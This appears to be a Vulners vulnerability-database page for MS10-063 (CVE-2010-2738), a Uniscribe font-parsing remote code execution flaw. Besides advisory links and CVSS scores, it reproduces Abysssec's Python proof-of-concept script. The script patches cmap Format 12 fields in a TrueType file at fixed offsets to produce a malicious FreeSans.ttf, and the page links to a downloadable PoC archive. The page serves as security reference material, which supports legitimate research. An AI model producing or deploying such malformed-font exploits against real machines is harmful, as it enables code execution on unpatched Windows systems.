Vulners
Lucene search
Microsoft Unicode Scripts Processor - Remote Code Execution (MS10-063)
| Reporter | Title | Published | Views | Family All 19 |
|---|---|---|---|---|
 | Microsoft Unicode Scripts Processor Remote Code Execution | 1 Oct 201000:00 | – | zdt |
 | CVE-2010-2738 | 30 Sep 201000:00 | – | circl |
 | Microsoft Windows Uniscribe Memory Corruption (CVE-2010-2738) | 6 Dec 202000:00 | – | checkpoint_advisories |
| Uniscribe Font Parsing Engine Remote Code Excution (MS10-063; CVE-2010-2738) | 5 Jul 201100:00 | – | checkpoint_advisories |
| Embedded Base-64 Encoded TTF Files (CVE-2010-2738) | 14 Sep 201000:00 | – | checkpoint_advisories |
 | CVE-2010-2738 | 15 Sep 201018:00 | – | cve |
 | CVE-2010-2738 | 15 Sep 201018:00 | – | cvelist |
 | Microsoft Unicode Scripts Processor - Remote Code Execution (MS10-063) | 30 Sep 201000:00 | – | exploitpack |
 | MS10-063: Vulnerability in Unicode Scripts Processor could lead to remote code execution | 6 Nov 201902:31 | – | mskb |
 | CVE-2010-2738 | 15 Sep 201019:00 | – | nvd |
10
'''
__ __ ____ _ _ ____
| \/ |/ __ \ /\ | | | | _ \
| \ / | | | | / \ | | | | |_) |
| |\/| | | | |/ /\ \| | | | _ < (Final Binary Analysis)
| | | | |__| / ____ \ |__| | |_) |
|_| |_|\____/_/ \_\____/|____/
'''
'''
Title : Microsoft Unicode Scripts Processor Remote Code Execution
Version : usp10.dll XP , Vista
Analysis : http://www.abysssec.com
Vendor : http://www.microsoft.com
Impact : Critical
Contact : shahin [at] abysssec.com , info [at] abysssec.com
Twitter : @abysssec
CVE : CVE-2010-2738
MOAUB Number : MOAUB-FINAL
http://www.exploit-db.com/moaub-30-microsoft-unicode-scripts-processor-remote-code-execution-ms10-063/
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15158.zip (moaub-30-PoC.zip)
'''
import sys
import struct
def main():
try:
fdR = open('src.ttf', 'rb+')
strTotal = fdR.read()
str1 = strTotal[:18316]
nGroups = '\x00\x00\x00\xDC' # nGroups field from Format 12 subtable of cmap table
startCharCode = '\x00\xE5\xF7\x20' # startCharCode field from a Group Structure
endCharCode = '\x00\xE5\xF7\xFE' # endCharCode field from a Group Structure
str2 = strTotal[18328:]
fdW= open('FreeSans.ttf', 'wb+')
fdW.write(str1)
fdW.write(nGroups)
fdW.write(startCharCode)
fdW.write(endCharCode)
fdW.write(str2)
fdW.close()
fdR.close()
print '[-] Font file generated'
except IOError:
print '[*] Error : An IO error has occurred'
print '[-] Exiting ...'
sys.exit(-1)
if __name__ == '__main__':
main()Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
30 Sep 2010 00:00Current
7High risk
Vulners AI Score7
CVSS 29.3
EPSS0.15844